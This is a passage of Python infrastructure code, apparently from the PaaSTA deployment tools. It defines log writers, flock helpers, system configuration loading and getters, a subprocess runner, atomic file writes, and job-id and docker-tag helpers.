{
"timestamp": timestamp,
"cluster": cluster,
"service": service,
"instance": instance,
"user": user,
"host": host,
"action": action,
"action_details": action_details,
},
sort_keys=True,
)
return message
def get_log_name_for_service(service: str, prefix: str = None) -> str:
if prefix:
return f"stream_paasta_{prefix}_{service}"
return "stream_paasta_%s" % service
try:
import clog
# Somehow clog turns on DeprecationWarnings, so we need to disable them
# again after importing it.
warnings.filterwarnings("ignore", category=DeprecationWarning)
@register_log_writer("scribe")
class ScribeLogWriter(LogWriter):
def __init__(
self,
scribe_host: str = "169.254.255.254",
scribe_port: int = 1463,
scribe_disable: bool = False,
**kwargs: Any,
) -> None:
clog.config.configure(
scribe_host=scribe_host,
scribe_port=scribe_port,
scribe_disable=scribe_disable,
)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
"""This expects someone (currently the paasta cli main()) to have already
configured the log object. We'll just write things to it.
"""
if level == "event":
paasta_print(f"[service {service}] {line}", file=sys.stdout)
elif level == "debug":
paasta_print(f"[service {service}] {line}", file=sys.stderr)
else:
raise NoSuchLogLevel
log_name = get_log_name_for_service(service)
formatted_line = format_log_line(
level, cluster, service, instance, component, line
)
clog.log_line(log_name, formatted_line)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
log_name = AUDIT_LOG_STREAM
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
clog.log_line(log_name, formatted_line)
except ImportError:
warnings.warn("clog is unavailable")
@register_log_writer("null")
class NullLogWriter(LogWriter):
"""A LogWriter class that doesn't do anything. Primarily useful for integration tests where we don't care about
logs."""
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
@contextlib.contextmanager
def _empty_context() -> Iterator[None]:
yield
_AnyIO = Union[io.IOBase, IO]
@register_log_writer("file")
class FileLogWriter(LogWriter):
def __init__(
self,
path_format: str,
mode: str = "a+",
line_delimiter: str = "\n",
flock: bool = False,
) -> None:
self.path_format = path_format
self.mode = mode
self.flock = flock
self.line_delimiter = line_delimiter
def maybe_flock(self, fd: _AnyIO) -> ContextManager:
if self.flock:
# https://github.com/python/typeshed/issues/1548
return flock(fd)
else:
return _empty_context()
def format_path(
self, service: str, component: str, level: str, cluster: str, instance: str
) -> str:
return self.path_format.format(
service=service,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_message(self, path: str, message: str) -> None:
# We use io.FileIO here because it guarantees that write() is implemented with a single write syscall,
# and on Linux, writes to O_APPEND files with a single write syscall are atomic.
#
# https://docs.python.org/2/library/io.html#io.FileIO
# http://article.gmane.org/gmane.linux.kernel/43445
try:
with io.FileIO(path, mode=self.mode, closefd=True) as f:
with self.maybe_flock(f):
f.write(message.encode("UTF-8"))
except IOError as e:
paasta_print(
"Could not log to {}: {}: {} -- would have logged: {}".format(
path, type(e).__name__, str(e), message
),
file=sys.stderr,
)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(service, component, level, cluster, instance)
to_write = "{}{}".format(
format_log_line(level, cluster, service, instance, component, line),
self.line_delimiter,
)
self._log_message(path, to_write)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(AUDIT_LOG_STREAM, "", "", cluster, instance)
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
to_write = f"{formatted_line}{self.line_delimiter}"
self._log_message(path, to_write)
@contextlib.contextmanager
def flock(fd: _AnyIO) -> Iterator[None]:
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX)
yield
finally:
fcntl.flock(fd.fileno(), fcntl.LOCK_UN)
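# Illustrative usage (not part of the original module): FileLogWriter above uses
# flock() (when constructed with flock=True) to serialize appends from multiple
# processes, e.g.
#
#     with io.FileIO("/tmp/paasta.log", mode="a+") as f:
#         with flock(f):
#             f.write(b"one atomic line\n")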
@contextlib.contextmanager
def timed_flock(fd: _AnyIO, seconds: int = 1) -> Iterator[None]:
""" Attempt to grab an exclusive flock with a timeout. Uses Timeout, so will
raise a TimeoutError if `seconds` elapses before the flock can be obtained
"""
# We don't want to wrap the user code in the timeout, just the flock grab
flock_context = flock(fd)
with Timeout(seconds=seconds):
flock_context.__enter__()
try:
yield
finally:
flock_context.__exit__(*sys.exc_info())
def _timeout(process: Popen) -> None:
"""Helper function for _run. It terminates the process.
Doesn't raise OSError if we try to terminate a non-existing process,
as there can be a very small window between poll() and kill().
"""
if process.poll() is None:
try:
# sending SIGKILL to the process
process.kill()
except OSError as e:
# No such process error
# The process could have been terminated meanwhile
if e.errno != errno.ESRCH:
raise
class PaastaNotConfiguredError(Exception):
pass
class NoConfigurationForServiceError(Exception):
pass
def get_readable_files_in_glob(glob: str, path: str) -> List[str]:
"""
Returns a sorted list of readable files matching the input glob, found by recursively searching the given path
"""
globbed_files = []
for root, dirs, files in os.walk(path):
for f in files:
fn = os.path.join(root, f)
if os.path.isfile(fn) and os.access(fn, os.R_OK) and fnmatch(fn, glob):
globbed_files.append(fn)
return sorted(globbed_files)
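# Example (illustrative): get_readable_files_in_glob("*.json", "/etc/paasta") walks
# /etc/paasta recursively and returns the sorted paths of readable JSON files;
# load_system_paasta_config below relies on this to gather the files it merges.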
class ClusterAutoscalingResource(TypedDict):
type: str
id: str
region: str
pool: str
min_capacity: int
max_capacity: int
IdToClusterAutoscalingResourcesDict = Dict[str, ClusterAutoscalingResource]
class ResourcePoolSettings(TypedDict):
target_utilization: float
drain_timeout: int
PoolToResourcePoolSettingsDict = Dict[str, ResourcePoolSettings]
class ChronosConfig(TypedDict, total=False):
user: str
password: str
url: List[str]
class MarathonConfigDict(TypedDict, total=False):
user: str
password: str
url: List[str]
class LocalRunConfig(TypedDict, total=False):
default_cluster: str
class RemoteRunConfig(TypedDict, total=False):
default_role: str
class SparkRunConfig(TypedDict, total=False):
default_cluster: str
default_pool: str
class PaastaNativeConfig(TypedDict, total=False):
principal: str
secret: str
ExpectedSlaveAttributes = List[Dict[str, Any]]
class KubeKindDict(TypedDict, total=False):
singular: str
plural: str
class KubeCustomResourceDict(TypedDict, total=False):
version: str
file_prefix: str
kube_kind: KubeKindDict
group: str
class SystemPaastaConfigDict(TypedDict, total=False):
api_endpoints: Dict[str, str]
auth_certificate_ttl: str
auto_hostname_unique_size: int
cluster: str
cluster_autoscaler_max_decrease: float
cluster_autoscaler_max_increase: float
cluster_autoscaling_draining_enabled: bool
cluster_autoscaling_resources: IdToClusterAutoscalingResourcesDict
cluster_boost_enabled: bool
cluster_fqdn_format: str
clusters: Sequence[str]
dashboard_links: Dict[str, Dict[str, str]]
deploy_blacklist: UnsafeDeployBlacklist
deploy_whitelist: UnsafeDeployWhitelist
deployd_big_bounce_deadline: float
deployd_log_level: str
deployd_maintenance_polling_frequency: int
deployd_metrics_provider: str
deployd_number_workers: int
deployd_startup_bounce_deadline: float
deployd_startup_oracle_enabled: bool
deployd_worker_failure_backoff_factor: int
deployd_use_zk_queue: bool
disabled_watchers: List
docker_registry: str
dockercfg_location: str
enable_client_cert_auth: bool
enable_nerve_readiness_check: bool
enforce_disk_quota: bool
expected_slave_attributes: ExpectedSlaveAttributes
filter_bogus_mesos_cputime_enabled: bool
fsm_template: str
hacheck_sidecar_image_url: str
kubernetes_custom_resources: List[KubeCustomResourceDict]
kubernetes_use_hacheck_sidecar: bool
local_run_config: LocalRunConfig
log_reader: LogReaderConfig
log_writer: LogWriterConfig
maintenance_resource_reservation_enabled: bool
marathon_servers: List[MarathonConfigDict]
mesos_config: Dict
metrics_provider: str
monitoring_config: Dict
nerve_readiness_check_script: str
paasta_native: PaastaNativeConfig
pki_backend: str
previous_marathon_servers: List[MarathonConfigDict]
register_k8s_pods: bool
register_marathon_services: bool
register_native_services: bool
remote_run_config: RemoteRunConfig
resource_pool_settings: PoolToResourcePoolSettingsDict
secret_provider: str
security_check_command: str
sensu_host: str
sensu_port: int
slack: Dict[str, str]
spark_run_config: SparkRunConfig
synapse_haproxy_url_format: str
synapse_host: str
synapse_port: int
taskproc: Dict
tron: Dict
vault_cluster_map: Dict
vault_environment: str
volumes: List[DockerVolume]
zookeeper: str
def load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Reads Paasta configs in specified directory in lexicographical order and deep merges
the dictionaries (last file wins).
"""
if not os.path.isdir(path):
raise PaastaNotConfiguredError(
"Could not find system paasta configuration directory: %s" % path
)
if not os.access(path, os.R_OK):
raise PaastaNotConfiguredError(
"Could not read from system paasta configuration directory: %s" % path
)
try:
file_stats = frozenset(
{
(fn, os.stat(fn))
for fn in get_readable_files_in_glob(glob="*.json", path=path)
}
)
return parse_system_paasta_config(file_stats, path)
except IOError as e:
raise PaastaNotConfiguredError(
f"Could not load system paasta config file {e.filename}: {e.strerror}"
)
def optionally_load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Tries to load the system paasta config, but will return an empty configuration if not available,
without raising.
"""
try:
return load_system_paasta_config(path=path)
except PaastaNotConfiguredError:
return SystemPaastaConfig({}, "")
@lru_cache()
def parse_system_paasta_config(
file_stats: FrozenSet[Tuple[str, os.stat_result]], path: str
) -> "SystemPaastaConfig":
"""Pass in a dictionary of filename -> os.stat_result, and this returns the merged parsed configs"""
config: SystemPaastaConfigDict = {}
for filename, _ in file_stats:
with open(filename) as f:
config = deep_merge_dictionaries(
json.load(f), config, allow_duplicate_keys=False
)
return SystemPaastaConfig(config, path)
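# Illustrative layout (file names and values are assumptions): with a file such as
# /etc/paasta/cluster.json containing {"cluster": "norcal-devc"},
# load_system_paasta_config() deep merges every readable *.json in the directory
# and the resulting SystemPaastaConfig reports get_cluster() == "norcal-devc".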
class SystemPaastaConfig:
def __init__(self, config: SystemPaastaConfigDict, directory: str) -> None:
self.directory = directory
self.config_dict = config
def __eq__(self, other: Any) -> bool:
if isinstance(other, SystemPaastaConfig):
return (
self.directory == other.directory
and self.config_dict == other.config_dict
)
return False
def __repr__(self) -> str:
return f"SystemPaastaConfig({self.config_dict!r}, {self.directory!r})"
def get_zk_hosts(self) -> str:
"""Get the zk_hosts defined in this hosts's cluster config file.
Strips off the zk:// prefix, if it exists, for use with Kazoo.
:returns: The zk_hosts specified in the paasta configuration
"""
try:
hosts = self.config_dict["zookeeper"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find zookeeper connection string in configuration directory: %s"
% self.directory
)
# how do python strings not have a method for doing this
if hosts.startswith("zk://"):
return hosts[len("zk://") :]
return hosts
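# Illustrative example (not part of the original class): a "zookeeper" value of
# "zk://zk1:2181,zk2:2181/paasta" is returned as "zk1:2181,zk2:2181/paasta",
# ready to hand to KazooClient(hosts=...).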
def get_system_docker_registry(self) -> str:
"""Get the docker_registry defined in this host's cluster config file.
:returns: The docker_registry specified in the paasta configuration
"""
try:
return self.config_dict["docker_registry"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find docker registry in configuration directory: %s"
% self.directory
)
def get_volumes(self) -> Sequence[DockerVolume]:
"""Get the volumes defined in this host's volumes config file.
:returns: The list of volumes specified in the paasta configuration
"""
try:
return self.config_dict["volumes"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find volumes in configuration directory: %s" % self.directory
)
def get_cluster(self) -> str:
"""Get the cluster defined in this host's cluster config file.
:returns: The name of the cluster defined in the paasta configuration
"""
try:
return self.config_dict["cluster"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find cluster in configuration directory: %s" % self.directory
)
def get_dashboard_links(self) -> Mapping[str, Mapping[str, str]]:
return self.config_dict["dashboard_links"]
def get_auto_hostname_unique_size(self) -> int:
"""
We automatically add a ["hostname", "UNIQUE"] constraint to "small" services running in production clusters.
If there are less than or equal to this number of instances, we consider it small.
We fail safe and return -1 to avoid adding the ['hostname', 'UNIQUE'] constraint if this value is not defined
:returns: The integer size of a small service
"""
return self.config_dict.get("auto_hostname_unique_size", -1)
def get_api_endpoints(self) -> Mapping[str, str]:
return self.config_dict["api_endpoints"]
def get_enable_client_cert_auth(self) -> bool:
"""
If enabled, present a client certificate from ~/.paasta/pki/<cluster>.crt and ~/.paasta/pki/<cluster>.key
"""
return self.config_dict.get("enable_client_cert_auth", True)
def get_enforce_disk_quota(self) -> bool:
"""
If enabled, add `--storage-opt size=SIZE` arg to `docker run` calls,
enforcing the disk quota as a result.
Please note that this should be enabled only for a supported environment
(which at the moment is only `overlay2` driver backed by `XFS`
filesystem mounted with `prjquota` option) otherwise Docker will fail
to start.
"""
return self.config_dict.get("enforce_disk_quota", False)
def get_auth_certificate_ttl(self) -> str:
"""
How long a ttl to request on auth certificates. Note that this may be limited
by policy in Vault
"""
return self.config_dict.get("auth_certificate_ttl", "11h")
def get_pki_backend(self) -> str:
"""
The Vault pki backend to use for issuing certificates
"""
return self.config_dict.get("pki_backend", "paastaca")
def get_fsm_template(self) -> str:
fsm_path = os.path.dirname(paasta_tools.cli.fsm.__file__)
template_path = os.path.join(fsm_path, "template")
return self.config_dict.get("fsm_template", template_path)
def get_log_writer(self) -> LogWriterConfig:
"""Get the log_writer configuration out of global paasta config
:returns: The log_writer dictionary.
"""
try:
return self.config_dict["log_writer"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_writer in configuration directory: %s"
% self.directory
)
def get_log_reader(self) -> LogReaderConfig:
"""Get the log_reader configuration out of global paasta config
:returns: the log_reader dictionary.
"""
try:
return self.config_dict["log_reader"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_reader in configuration directory: %s"
% self.directory
)
def get_metrics_provider(self) -> Optional[str]:
"""Get the metrics_provider configuration out of global paasta config
:returns: A string identifying the metrics_provider
"""
deployd_metrics_provider = self.config_dict.get("deployd_metrics_provider")
if deployd_metrics_provider is not None:
return deployd_metrics_provider
return self.config_dict.get("metrics_provider")
def get_deployd_worker_failure_backoff_factor(self) -> int:
"""Get the factor for calculating exponential backoff when a deployd worker
fails to bounce a service
:returns: An integer
"""
return self.config_dict.get("deployd_worker_failure_backoff_factor", 30)
def get_deployd_maintenance_polling_frequency(self) -> int:
"""Get the frequency in seconds that the deployd maintenance watcher should
poll mesos's api for new draining hosts
:returns: An integer
"""
return self.config_dict.get("deployd_maintenance_polling_frequency", 30)
def get_deployd_startup_oracle_enabled(self) -> bool:
"""This controls whether deployd will add all services that need a bounce on
startup. Generally this is desirable behavior. If you are performing a bounce
of *all* services you will want to disable this.
:returns: A boolean
"""
return self.config_dict.get("deployd_startup_oracle_enabled", True)
def get_sensu_host(self) -> str:
"""Get the host that we should send sensu events to.
:returns: the sensu_host string, or localhost if not specified.
"""
return self.config_dict.get("sensu_host", "localhost")
def get_sensu_port(self) -> int:
"""Get the port that we should send sensu events to.
:returns: the sensu_port value as an integer, or 3030 if not specified.
"""
return int(self.config_dict.get("sensu_port", 3030))
def get_dockercfg_location(self) -> str:
"""Get the location of the dockerfile, as a URI.
:returns: the URI specified, or file:///root/.dockercfg if not specified.
"""
return self.config_dict.get("dockercfg_location", DEFAULT_DOCKERCFG_LOCATION)
def get_synapse_port(self) -> int:
"""Get the port that haproxy-synapse exposes its status on. Defaults to 3212.
:returns: the haproxy-synapse status port."""
return int(self.config_dict.get("synapse_port", 3212))
def get_default_synapse_host(self) -> str:
"""Get the default host we should interrogate for haproxy-synapse state.
:returns: A hostname that is running haproxy-synapse."""
return self.config_dict.get("synapse_host", "localhost")
def get_synapse_haproxy_url_format(self) -> str:
"""Get a format string for the URL to query for haproxy-synapse state. This format string gets two keyword
arguments, host and port. Defaults to "http://{host:s}:{port:d}/;csv;norefresh".
:returns: A format string for constructing the URL of haproxy-synapse's status page."""
return self.config_dict.get(
"synapse_haproxy_url_format", DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT
)
def get_cluster_autoscaling_resources(self) -> IdToClusterAutoscalingResourcesDict:
return self.config_dict.get("cluster_autoscaling_resources", {})
def get_cluster_autoscaling_draining_enabled(self) -> bool:
""" Enable mesos maintenance mode and trigger draining of instances before the
autoscaler terminates the instance.
:returns: A bool"""
return self.config_dict.get("cluster_autoscaling_draining_enabled", True)
def get_cluster_autoscaler_max_increase(self) -> float:
""" Set the maximum increase that the cluster autoscaler can make in each run
:returns: A float"""
return self.config_dict.get("cluster_autoscaler_max_increase", 0.2)
def get_cluster_autoscaler_max_decrease(self) -> float:
""" Set the maximum decrease that the cluster autoscaler can make in each run
:returns: A float"""
return self.config_dict.get("cluster_autoscaler_max_decrease", 0.1)
def get_maintenance_resource_reservation_enabled(self) -> bool:
""" Enable un/reserving of resources when we un/drain a host in mesos maintenance
*and* after tasks are killed in setup_marathon_job etc.
:returns: A bool"""
return self.config_dict.get("maintenance_resource_reservation_enabled", True)
def get_cluster_boost_enabled(self) -> bool:
""" Enable the cluster boost. Note that the boost only applies to the CPUs.
If the boost is toggled on here but not configured, it will be transparent.
:returns: A bool: True means cluster boost is enabled."""
return self.config_dict.get("cluster_boost_enabled", False)
def get_resource_pool_settings(self) -> PoolToResourcePoolSettingsDict:
return self.config_dict.get("resource_pool_settings", {})
def get_cluster_fqdn_format(self) -> str:
"""Get a format string that constructs a DNS name pointing at the paasta masters in a cluster. This format
string gets one parameter: cluster. Defaults to 'paasta-{cluster:s}.yelp'.
:returns: A format string for constructing the FQDN of the masters in a given cluster."""
return self.config_dict.get("cluster_fqdn_format", "paasta-{cluster:s}.yelp")
def get_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("marathon_servers", [])
def get_previous_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("previous_marathon_servers", [])
def get_local_run_config(self) -> LocalRunConfig:
"""Get the local-run config
:returns: The local-run job config dictionary"""
return self.config_dict.get("local_run_config", {})
def get_remote_run_config(self) -> RemoteRunConfig:
"""Get the remote-run config
:returns: The remote-run system_paasta_config dictionary"""
return self.config_dict.get("remote_run_config", {})
def get_spark_run_config(self) -> SparkRunConfig:
"""Get the spark-run config
:returns: The spark-run system_paasta_config dictionary"""
return self.config_dict.get("spark_run_config", {})
def get_paasta_native_config(self) -> PaastaNativeConfig:
return self.config_dict.get("paasta_native", {})
def get_mesos_cli_config(self) -> Dict:
"""Get the config for mesos-cli
:returns: The mesos cli config
"""
return self.config_dict.get("mesos_config", {})
def get_monitoring_config(self) -> Dict:
"""Get the monitoring config
:returns: the monitoring config dictionary"""
return self.config_dict.get("monitoring_config", {})
def get_deploy_blacklist(self) -> DeployBlacklist:
"""Get global blacklist. This applies to all services
in the cluster
:returns: The blacklist
"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""Get global whitelist. This applies to all services
in the cluster
:returns: The whitelist
"""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_expected_slave_attributes(self) -> ExpectedSlaveAttributes:
"""Return a list of dictionaries, representing the expected combinations of attributes in this cluster. Used for
calculating the default routing constraints."""
return self.config_dict.get("expected_slave_attributes")
def get_security_check_command(self) -> Optional[str]:
"""Get the script to be executed during the security-check build step
:return: The name of the file
"""
return self.config_dict.get("security_check_command", None)
def get_deployd_number_workers(self) -> int:
"""Get the number of workers to consume deployment q
:return: integer
"""
return self.config_dict.get("deployd_number_workers", 4)
def get_deployd_big_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances for SystemPaastaConfig
changes.
:return: float
"""
return float(
self.config_dict.get("deployd_big_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_startup_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances on deployd startup.
:return: float
"""
return float(
self.config_dict.get("deployd_startup_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_log_level(self) -> str:
"""Get the log level for paasta-deployd
:return: string name of python logging level, e.g. INFO, DEBUG etc.
"""
return self.config_dict.get("deployd_log_level", "INFO")
def get_deployd_use_zk_queue(self) -> bool:
return self.config_dict.get("deployd_use_zk_queue", True)
def get_hacheck_sidecar_image_url(self) -> str:
"""Get the docker image URL for the hacheck sidecar container"""
return self.config_dict.get(
"hacheck_sidecar_image_url",
"docker-paasta.yelpcorp.com:443/hacheck-k8s-sidecar",
)
def get_register_k8s_pods(self) -> bool:
"""Enable registration of k8s services in nerve"""
return self.config_dict.get("register_k8s_pods", False)
def get_kubernetes_custom_resources(self) -> Sequence[KubeCustomResourceDict]:
"""List of custom resources that should be synced by setup_kubernetes_cr """
return self.config_dict.get("kubernetes_custom_resources", [])
def get_kubernetes_use_hacheck_sidecar(self) -> bool:
return self.config_dict.get("kubernetes_use_hacheck_sidecar", True)
def get_register_marathon_services(self) -> bool:
"""Enable registration of marathon services in nerve"""
return self.config_dict.get("register_marathon_services", True)
def get_register_native_services(self) -> bool:
"""Enable registration of native paasta services in nerve"""
return self.config_dict.get("register_native_services", False)
def get_nerve_readiness_check_script(self) -> str:
"""Script to check service is up in smartstack"""
return self.config_dict.get(
"nerve_readiness_check_script", "/check_smartstack_up.sh"
)
def get_taskproc(self) -> Dict:
return self.config_dict.get("taskproc", {})
def get_disabled_watchers(self) -> List:
return self.config_dict.get("disabled_watchers", [])
def get_vault_environment(self) -> Optional[str]:
""" Get the environment name for the vault cluster
This must match the environment keys in the secret json files
used by all services in this cluster"""
return self.config_dict.get("vault_environment")
def get_vault_cluster_config(self) -> dict:
""" Get a map from paasta_cluster to vault ecosystem. We need
this because not every ecosystem will have its own vault cluster"""
return self.config_dict.get("vault_cluster_map", {})
def get_secret_provider_name(self) -> str:
""" Get the name for the configured secret_provider, used to
decrypt secrets"""
return self.config_dict.get("secret_provider", "paasta_tools.secret_providers")
def get_slack_token(self) -> str:
""" Get a slack token for slack notifications. Returns None if there is
none available """
return self.config_dict.get("slack", {}).get("token", None)
def get_tron_config(self) -> dict:
return self.config_dict.get("tron", {})
def get_clusters(self) -> Sequence[str]:
return self.config_dict.get("clusters", [])
def _run(
command: Union[str, List[str]],
env: Mapping[str, str] = os.environ,
timeout: float = None,
log: bool = False,
stream: bool = False,
stdin: Any = None,
stdin_interrupt: bool = False,
popen_kwargs: Dict = {},
**kwargs: Any,
) -> Tuple[int, str]:
"""Given a command, run it. Return a tuple of the return code and any
output.
:param timeout: If specified, the command will be terminated after timeout
seconds.
:param log: If True, each output line is also sent to _log; in that case it is mandatory
to pass at least a :service: and a :component: parameter. Optionally you
can pass :cluster:, :instance: and :loglevel: parameters for logging.
We wanted to use plumbum instead of rolling our own thing with
subprocess.Popen but were blocked by
https://github.com/tomerfiliba/plumbum/issues/162 and our local BASH_FUNC
magic.
"""
output = []
if log:
service = kwargs["service"]
component = kwargs["component"]
cluster = kwargs.get("cluster", ANY_CLUSTER)
instance = kwargs.get("instance", ANY_INSTANCE)
loglevel = kwargs.get("loglevel", DEFAULT_LOGLEVEL)
try:
if not isinstance(command, list):
command = shlex.split(command)
popen_kwargs["stdout"] = PIPE
popen_kwargs["stderr"] = STDOUT
popen_kwargs["stdin"] = stdin
popen_kwargs["env"] = env
process = Popen(command, **popen_kwargs)
if stdin_interrupt:
def signal_handler(signum: int, frame: FrameType) -> None:
process.stdin.write("\n".encode("utf-8"))
process.stdin.flush()
process.wait()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# start the timer if we specified a timeout
if timeout:
proctimer = threading.Timer(timeout, _timeout, [process])
proctimer.start()
for linebytes in iter(process.stdout.readline, b""):
line = linebytes.decode("utf-8", errors="replace").rstrip("\n")
linebytes = linebytes.strip(b"\n")
# when streaming, echo each line as it arrives; otherwise buffer it for the return value
if stream:
paasta_print(linebytes)
else:
output.append(line)
if log:
_log(
service=service,
line=line,
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
# when finished, get the exit code
process.wait()
returncode = process.returncode
except OSError as e:
if log:
_log(
service=service,
line=e.strerror.rstrip("\n"),
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
output.append(e.strerror.rstrip("\n"))
returncode = e.errno
except (KeyboardInterrupt, SystemExit):
# need to clean up the timing thread here
if timeout:
proctimer.cancel()
raise
else:
# Stop the timer
if timeout:
proctimer.cancel()
if returncode == -9:
output.append(f"Command '{command}' timed out (longer than {timeout}s)")
return returncode, "\n".join(output)
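# Illustrative usage of _run (not part of the original module): it returns the
# exit code plus the combined stdout/stderr text. The command and timeout
# below are placeholders.
#
#     returncode, output = _run(["ls", "-l", "/tmp"], timeout=10)
#     if returncode != 0:
#         print("command failed:\n" + output)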
def get_umask() -> int:
"""Get the current umask for this process. NOT THREAD SAFE."""
old_umask = os.umask(0o0022)
os.umask(old_umask)
return old_umask
def get_user_agent() -> str:
base_name = os.path.basename(sys.argv[0])
if base_name == "gunicorn":
return f"{sys.argv[-1]} {paasta_tools.__version__}"
elif len(sys.argv) >= 1:
return f"{base_name} {paasta_tools.__version__}"
else:
return f"PaaSTA Tools {paasta_tools.__version__}"
@contextlib.contextmanager
def atomic_file_write(target_path: str) -> Iterator[IO]:
dirname = os.path.dirname(target_path)
basename = os.path.basename(target_path)
if target_path == "-":
yield sys.stdout
else:
with tempfile.NamedTemporaryFile(
dir=dirname, prefix=(".%s-" % basename), delete=False, mode="w"
) as f:
temp_target_path = f.name
yield f
mode = 0o0666 & (~get_umask())
os.chmod(temp_target_path, mode)
os.rename(temp_target_path, target_path)
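# Sketch of how atomic_file_write is meant to be used (the path is a
# placeholder): data is written to a temporary file in the same directory and
# only renamed over the target when the `with` block exits, so readers never
# see a partially written file.
#
#     with atomic_file_write("/tmp/example.yaml") as f:
#         f.write(serialized_config)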
class InvalidJobNameError(Exception):
pass
def compose_job_id(
name: str,
instance: str,
git_hash: Optional[str] = None,
config_hash: Optional[str] = None,
spacer: str = SPACER,
) -> str:
"""Compose a job/app id by concatenating its name, instance, git hash, and config hash.
:param name: The name of the service
:param instance: The instance of the service
:param git_hash: The git_hash portion of the job_id. If git_hash is set,
config_hash must also be set.
:param config_hash: The config_hash portion of the job_id. If config_hash
is set, git_hash must also be set.
:returns: <name><SPACER><instance> if no tag, or <name><SPACER><instance><SPACER><hashes>...
if extra hash inputs are provided.
"""
composed = f"{name}{spacer}{instance}"
if git_hash and config_hash:
composed = f"{composed}{spacer}{git_hash}{spacer}{config_hash}"
elif git_hash or config_hash:
raise InvalidJobNameError(
"invalid job id because git_hash (%s) and config_hash (%s) must "
"both be defined or neither can be defined" % (git_hash, config_hash)
)
return composed
def decompose_job_id(job_id: str, spacer: str = SPACER) -> Tuple[str, str, str, str]:
"""Break a composed job id into its constituent (service name, instance,
git hash, config hash) by splitting with ``spacer``.
:param job_id: The composed id of the job/app
:returns: A tuple (service name, instance, git hash, config hash) that
comprise the job_id
"""
decomposed = job_id.split(spacer)
if len(decomposed) == 2:
git_hash = None
config_hash = None
elif len(decomposed) == 4:
git_hash = decomposed[2]
config_hash = decomposed[3]
else:
raise InvalidJobNameError("invalid job id %s" % job_id)
return (decomposed[0], decomposed[1], git_hash, config_hash)
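# Illustrative round trip through compose_job_id/decompose_job_id, assuming
# SPACER is "." (its actual value is defined elsewhere in this module):
#
#     compose_job_id("svc", "main")                      -> "svc.main"
#     compose_job_id("svc", "main", "abc123", "def456")  -> "svc.main.abc123.def456"
#     decompose_job_id("svc.main.abc123.def456")         -> ("svc", "main", "abc123", "def456")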
def build_docker_image_name(service: str) -> str:
"""docker-paasta.yelpcorp.com:443 is the URL for the Registry where PaaSTA
will look for your images.
:returns: a sanitized-for-Jenkins (s,/,-,g) version of the
service's path in git. E.g. For git.yelpcorp.com:services/foo the
docker image name is docker_registry/services-foo.
"""
docker_registry_url = get_service_docker_registry(service)
name = f"{docker_registry_url}/services-{service}"
return name
def build_docker_tag(service: str, upstream_git_commit: str) -> str:
"""Builds the DOCKER_TAG string
upstream_git_commit is the SHA that we're building. Usually this is the
tip of origin/master.
"""
tag = "{}:paasta-{}".format(build_docker_image_name(service), upstream_git_commit)
return tag
def check_docker_image(service: str, tag: str) -> bool:
"""Checks whether the given image for :service: with :tag: exists.
:raises: ValueError if more than one docker image with :tag: found.
:returns: True if there is exactly one matching image found.
"""
docker_client = get_docker_client()
image_name = build_docker_image_name(service)
docker_tag = build_docker_tag(service, tag)
images = docker_client.images(name=image_name)
# image['RepoTags'] may be None
# Fixed upstream but only in docker-py 2.
# https://github.com/docker/docker-py/issues/1401
result = [image for image in images if docker_tag in (image["RepoTags"] or [])]
if len(result) > 1:
raise ValueError(
f"More than one docker image found with tag {docker_tag}\n{result}"
)
return len(result) == 1
def datetime_from_utc_to_local(utc_datetime: datetime.datetime) -> datetime.datetime:
return datetime_convert_timezone(
utc_datetime, dateutil.tz.tzutc(), dateutil.tz.tzlocal()
)
def datetime_convert_timezone(
dt: datetime.datetime, from_zone: datetime.tzinfo, to_zone: datetime.tzinfo
) -> datetime.datetime:
dt = dt.replace(tzinfo=from_zone)
converted_datetime = dt.astimezone(to_zone)
converted_datetime = converted_datetime.replace(tzinfo=None)
return converted_datetime
def get_username() -> str:
